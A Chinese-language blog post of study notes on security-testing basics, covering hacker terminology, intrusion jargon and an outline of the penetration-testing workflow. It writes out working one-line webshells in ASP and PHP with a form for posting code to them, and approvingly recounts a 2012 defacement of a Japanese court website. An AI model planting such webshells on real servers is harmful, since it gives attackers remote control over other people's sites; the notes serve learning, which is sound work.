安全测试(一、基础知识)
我在B站找了一些视频,边看边学习,博客算是学习笔记吧
一、知识科普
1、黑客
“黑客”一词是由英语Hacker音译出来的,黑客所做的不是恶意破坏,他们是一群纵横于网络上的技术人员,热衷于科技探索、计算机科学研究。
2、骇客
骇客源自于Hacker,是指从事恶意破解商业软件、恶意入侵别人的网站等事务。未必有很高的技术,通常用一些简单的共计手段去达到一些炫耀、恶作剧、搞破坏的目的。
3、红客
中国特色产物,红客(Honker(A person or thing that honks))是指维护国家利益,不利用网络技术入侵自己国家电脑,利用自己技术维护国内网络安全,并对外来的一切进攻进行还击。
比如,2012年9月14日,中国黑客成功入侵日本最高法院官方网站,并在其网站上发布了有关钓鱼岛的图片和文字。该网站一度无法访问(本事件关系重大。中国给日本最最厉害的进攻)
4、白帽子
专门研究或者从事网络安全行业的人,通常受雇于各大安全公司,是提高网络、系统安全水平的主要力量.
5、黑帽子
专门研究木马、操作系统,寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。
6、灰帽子
专门研究木马、操作系统,寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。
7、相关计算机知识
1、脚本( asp、php、jsp )
2、html ( css、js、html )
3、HTTP协议
4、CMS (B/S )
5、MD5
8、专业术语
1、肉鸡:被黑客入侵并被长期驻扎的计算机或服务器。
2、抓鸡:利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为。
3、Webshell:通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。
4、漏洞:硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。
5、一句话木马:通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马。
<%eval request("pass")%>
<%execute(request("pass"))%>
request("pass") 接收客户端提交的数据,pass为执行命令的参数值。
eval/execute 函数执行客户端命令的内容
如:PHP的一句话木马:
<?php eval($_POST[cracer]);?>
下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改文件等等的各种功能。
<form method=post action=http://木马地址>
<textarea name=cracer>
//这里写php代码
phpinfo();
</textarea>
<input type=submit>
</form>
6、提权
操作系统低权限的账户将自己提升为管理员权限使用的方法。
7、后门
黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。
8、跳板
使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。
9、旁站入侵
即同服务器下的网站入侵,入侵之后可以通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有:WebRobot、御剑、明小子和web在线查询等。
10、C段入侵
即同C段下服务器入侵。如目标ip为192.168.1.253入侵192.168.1.*的任意一台机器,然后利用一些黑客工具嗅探获取在网络上传输的各种信息。常用的工具有:在windows下有Cain,在UNIX环境下有Sniffit,Snoop,Tcpdump,Dsniff 等。
二、渗透测试
1、渗透测试类型
1、黑盒测试
在未授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能存在的安全风险。
黑盒测试不同于黑客入侵,并不等于黑站。黑盒测试考验的是综合的能力(oS、Datebase、Script 、code、思路、社工)
思路与经验积累往往决定成败。三个臭皮匠赛过诸葛亮
2、白盒测试:相对黑盒测试,自盒测试基本是从内部发起
2、APT攻击
APT攻击,Advanced Persistent Threat,高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。
- 极强的隐蔽性
- 潜伏期长,持续性强
- 目标性强
3、渗透测试特点
- 充满挑战与刺激------不达目的不罢休
- 思路与经验累积往往决定成败
- 三个臭皮匠/众人拾材火焰高
三、渗透测试流程
渗透测试与入侵的最大区别:
渗透测试:更全面地找出服务器的问题,更倾向于保护。
入侵:不择手段地(甚至是具有破坏性的)拿到权限。
渗透测试流程:明确目标——信息收集——漏洞探测——形成报告——信息整理——获取所需——信息分析
1、明确目标
- 确定范围
- 确定规则
- 确定需求
2、信息收集
- 基础信息
- 系统信息
- 应用信息
- 版本信息
- 服务信息
- 人员信息
- 防护信息
3、漏洞探测
- 系统漏洞
- WebServer漏洞
- Web应用漏洞
- 其他端口服务漏洞
- 通信安全
4、漏洞验证
- 自动化验证
- 手工验证
- 试验验证
- 登陆猜解
- 业务漏洞验证
- 公开资源的利用
- 精准打击
- 绕过防御机制
- 定制攻击路径
- 绕过检测机制
- 攻击代码
- 实施攻击
- 获取内部信息
- 进一步渗透持续性存在*
- 清理痕迹
- 整理渗透工具
- 整理收集信息
- 整理漏洞信息
5、形成报告
- 按需整理
- 补充介绍
- 修补建议
6、信息整理
- 信息搜集是关键
- 做事不要太心急
- 多学习,多看源码
- 平时注意搜集0day
- 思路很重要